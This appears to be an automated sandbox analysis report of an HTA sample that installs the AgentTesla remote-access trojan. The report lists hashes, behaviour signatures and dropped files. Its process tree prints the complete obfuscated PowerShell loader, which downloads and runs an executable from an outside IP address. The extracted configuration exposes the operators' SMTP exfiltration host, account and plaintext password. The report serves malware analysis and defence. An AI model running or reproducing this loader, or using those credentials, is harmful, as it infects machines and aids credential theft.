Analysis
-
max time kernel
145s -
max time network
136s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
10-08-2024 17:49
General
-
Target
d4cb60a0e93c856f642f862e51cf4af34f626c8d1e1b995b5e9dfb3e72db1101.hta
-
Size
152KB
-
MD5
f904e8a5141b08f3f8e2121459f539fe
-
SHA1
56a3a5f48e339964c13c3c66fc08081763fa22ce
-
SHA256
d4cb60a0e93c856f642f862e51cf4af34f626c8d1e1b995b5e9dfb3e72db1101
-
SHA512
d5a02d2f891318c5926ffd67f0bc20e7dc964a10434a9a1d04769688bacc0535b13a86e5b35073c59b6945bf70fdaff5bc34cf6eb0afdaa1c8ede30fab4197dc
-
SSDEEP
768:tZ6A3yXNA0AGAzUGq4Lcl64c/9tB2KCgFPBh1VQiXAZO:t7
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.synergyinnovationsgroup.com - Port:
587 - Username:
[email protected] - Password:
C@p-Y8BoHc#? - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 7 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d4cb60a0e93c856f642f862e51cf4af34f626c8d1e1b995b5e9dfb3e72db1101.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowErsHeLL.eXe -Ex BYpaSs -nOP -W 1 -c dEViCECreDenTiaLDEploYMenT.ExE ; IEX($(IEX('[sYSteM.TeXt.encODIng]'+[ChaR]0X3A+[cHaR]0X3A+'utf8.gETSTrinG([SySteM.coNvErt]'+[chAR]58+[CHAr]58+'FRomBASE64STRIng('+[cHaR]0x22+'JGMxOHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSRGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRk1SdVFrbllSZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWU0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY3JQaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXdXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYzE4djo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNDcvODkvc2Fob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LVNsRWVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHaR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowErsHeLL.eXe -Ex BYpaSs -nOP -W 1 -c dEViCECreDenTiaLDEploYMenT.ExE ; IEX($(IEX('[sYSteM.TeXt.encODIng]'+[ChaR]0X3A+[cHaR]0X3A+'utf8.gETSTrinG([SySteM.coNvErt]'+[chAR]58+[CHAr]58+'FRomBASE64STRIng('+[cHaR]0x22+'JGMxOHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSRGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRk1SdVFrbllSZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWU0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY3JQaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXdXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYzE4djo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNDcvODkvc2Fob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LVNsRWVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\on3wls2q\on3wls2q.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F0.tmp" "c:\Users\Admin\AppData\Local\Temp\on3wls2q\CSC5DC8DE2CCF2546CE98299B71135291C.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\sahost.exe"C:\Users\Admin\AppData\Roaming\sahost.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Users\Admin\AppData\Roaming\sahost.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a4a1dbb6be297e07f33d9346373a9002
SHA10eebdb16dc0a54fdec22b36640521a1944e75038
SHA25640aeeaa895d81f1bf7cafeca08fc4669456d30700612d675a00899d014ea0c83
SHA51245c41f2b236c30502dac03faed17f18ef037efcc8fdeb3e37f5227f1e86e33d000acccd01447e74c2d048bca536e755602f3471d3aa77abc299ff79dc024b505
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD55097e0d8d222067149d6d450eb9a7d56
SHA1589420ee92926c19adc0266561ceb5ec43fd88b8
SHA256e47d3c6e5101f0197675b82ea8d7486412beb1b2b839c6d6105db371bc21a070
SHA5129a5c889a8452e1ebb8646d378cd5f8ff36886c3d40896411c01c9e9925a21b933b97c375048beb5327256f8a6780cd162d06ba169febec02c36b63eeeb339921
-
Filesize
346KB
MD53470b26b4f683b2c79794d5a71b5d681
SHA1cb17633bfb7e935c0ff9b9aded16ec64cd45880b
SHA25679c5102316d9d99b55f51c53550a99b9ccef58f7386d79601a314029625c87aa
SHA5122c7cae1b505c98c07873f592087bbc864600a80be8f33069417e67d35ed5f221fcee96eea3b230c4c3b8a3096c8c99f11187977be31af537490b5757d4eb55c4
-
Filesize
652B
MD58ccaf9c87ba17246e595e029e6382c2b
SHA114a9d8e9aefca96ad231ff7a40d3b5a46e2cee7b
SHA25625ebf3e737d4ac819cb34e4c32fe169b410a0aeda26bee5bed6be55aeebb4b19
SHA51265115049c0ceba6abb1e46b001c54c8b490041df96b93a3a07dd158d2d7efd2f83e672e84b83dfebd8dcfbaecb4705a3b2f51e6f9d937315ad97a92ea1df777e
-
Filesize
448B
MD596fb5c81fd98110eccd7462295c1182e
SHA1bf3ddf003e58c2e0e872c6219b87b3ab11095dac
SHA256f09d09fba37d82a7c487f866673905cecc84403bde45445fbf42d69060e4a328
SHA512b5e73d6c30da7c6e38a42a89777f160efe6ce68a7efb1f75a6de2e37e0584ed788a7d76ae62c8bcecceeb98ea155a5dd26c5815b904242f31c719469de59e4b7
-
Filesize
369B
MD5baa1234941e24c4b0c3d047f1cc0c73a
SHA148169a80de39320d3b0a73b88b1498da69f25fe9
SHA2568ceae9f0a80ffe689b98cfdef530497897c46882cf1a1b62724b689c3fb57004
SHA5123272400e932e7292f3effc974f7852ca0edb5c0066a098407c74c4985df550c56c25999600575559f4988df78248a19a2517467dedee11bc7689de3a51a14e27
-
Filesize
5KB
MD508de81a4584f5201086f57a7a93ed83b
SHA1266a6ecc8fb7dca115e6915cd75e2595816841a8
SHA2564883cd4231744be2dca4433ef62824b7957a3c16be54f8526270402d9413ebe6
SHA512b72e7cea5ce1f4dc64e65a1f683a3ef9e3fa2dc45cf421f569eb461f1fdcc0caf4ff62a872e62b400579f567c6ff9fc3c2e6e020cdca89d96015502c803a09b9
-
Filesize
12KB
MD56e55a6e7c3fdbd244042eb15cb1ec739
SHA1070ea80e2192abc42f358d47b276990b5fa285a9
SHA256acf90ab6f4edc687e94aaf604d05e16e6cfb5e35873783b50c66f307a35c6506
SHA5122d504b74da38edc967e3859733a2a9cacd885db82f0ca69bfb66872e882707314c54238344d45945dc98bae85772aceef71a741787922d640627d3c8ae8f1c35
-
Filesize
19.5MB
-
Filesize
256KB
-
Filesize
320KB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
660KB
-
Filesize
592KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
204KB
-
Filesize
472KB
-
Filesize
300KB
-
Filesize
120KB
-
Filesize
136KB
-
Filesize
5.0MB
-
Filesize
112KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
216KB